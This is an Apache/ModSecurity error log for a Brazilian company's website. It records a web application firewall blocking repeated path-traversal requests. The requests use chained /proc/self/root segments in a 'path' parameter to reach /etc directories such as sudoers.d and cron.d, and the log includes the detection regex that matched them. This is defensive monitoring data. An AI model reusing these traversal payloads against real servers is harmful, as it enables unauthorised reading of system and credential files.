[Mon Mar 16 18:24:47.859066 2026] [:error] [pid 10651:tid 140411632822016] [client 74.7.243.203:58282] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh1H7ysWC90G-1nBrBipgAAAY0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:24:59.669251 2026] [:error] [pid 10772:tid 140411733534464] [client 74.7.241.46:51382] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh1K_9ocpUE4ed4uDwR1QAAAgE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:25:57.102520 2026] [:error] [pid 10831:tid 140411699963648] [client 74.7.241.46:35858] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh1ZY6lpbStxTqkSkuG-gAAAkU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:25:58.487817 2026] [:error] [pid 14895:tid 140411565680384] [client 74.7.241.46:49860] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh1ZlajLEzk2WiQ-10wgAAAApU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:26:07.711471 2026] [:error] [pid 15061:tid 140411548894976] [client 74.7.241.46:49868] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh1b6TCbgAP5jq5TehKDAAAAtc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:26:27.559647 2026] [:error] [pid 29507:tid 140411616036608] [client 74.7.241.46:60640] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh1g0r9dMAiw-8KANNmpAAAAQ8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:26:39.723218 2026] [:error] [pid 10651:tid 140411641214720] [client 74.7.243.203:40800] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh1j7ysWC90G-1nBrBjIAAAAYw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:26:52.879437 2026] [:error] [pid 29507:tid 140411616036608] [client 74.7.228.16:36220] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abh1nEr9dMAiw-8KANNmsgAAAQ8"]
[Mon Mar 16 18:26:53.642471 2026] [:error] [pid 14895:tid 140411607643904] [client 74.7.241.46:53730] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh1nVajLEzk2WiQ-10wswAAApA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:26:56.391071 2026] [:error] [pid 10772:tid 140411616036608] [client 74.7.241.46:52910] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh1oP9ocpUE4ed4uDwSLQAAAg8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:26:57.738903 2026] [:error] [pid 10651:tid 140411691570944] [client 74.7.241.46:52916] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh1obysWC90G-1nBrBjJwAAAYY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:27:37.603408 2026] [:error] [pid 10772:tid 140411674785536] [client 74.7.243.203:43056] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh1yf9ocpUE4ed4uDwSVAAAAgg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:27:57.942925 2026] [:error] [pid 29507:tid 140411624429312] [client 74.7.241.46:41344] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh13Ur9dMAiw-8KANNm_AAAAQ4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:27:58.469622 2026] [:error] [pid 10651:tid 140411683178240] [client 74.7.243.203:32846] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh13rysWC90G-1nBrBjUgAAAYc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 18:29:40.259776 2026] [:error] [pid 15568:tid 140411607643904] [client 74.7.241.46:51510] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh2RKQpVkWug9HeOt9SsAAAA1A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:29:41.647473 2026] [:error] [pid 10651:tid 140411632822016] [client 74.7.241.46:37920] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh2RbysWC90G-1nBrBjgQAAAY0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:29:45.995354 2026] [:error] [pid 29802:tid 140411582465792] [client 74.7.241.46:37930] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh2Sc_BxrYCr4hPDw8IqwAAAdM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 18:29:52.419510 2026] [:error] [pid 15568:tid 140411666392832] [client 74.7.243.203:52062] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh2UKQpVkWug9HeOt9SvgAAA0k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:29:55.600668 2026] [:error] [pid 21806:tid 140411725141760] [client 74.7.241.46:37946] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh2U9SswJuvopo3lOh_DwAAAII"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 18:30:02.837205 2026] [:error] [pid 14895:tid 140411624429312] [client 74.7.244.31:33616] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abh2WlajLEzk2WiQ-10w9wAAAo4"]
[Mon Mar 16 18:30:03.648365 2026] [:error] [pid 10772:tid 140411557287680] [client 74.7.241.46:52974] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh2W_9ocpUE4ed4uDwSmAAAAhY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:30:06.273067 2026] [:error] [pid 21806:tid 140411557287680] [client 74.7.241.46:52464] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh2XtSswJuvopo3lOh_FwAAAJY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:30:12.899162 2026] [:error] [pid 21805:tid 140411557287680] [client 74.7.241.46:52470] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh2ZLABkC4fWIHEf8EWewAAAFY"], 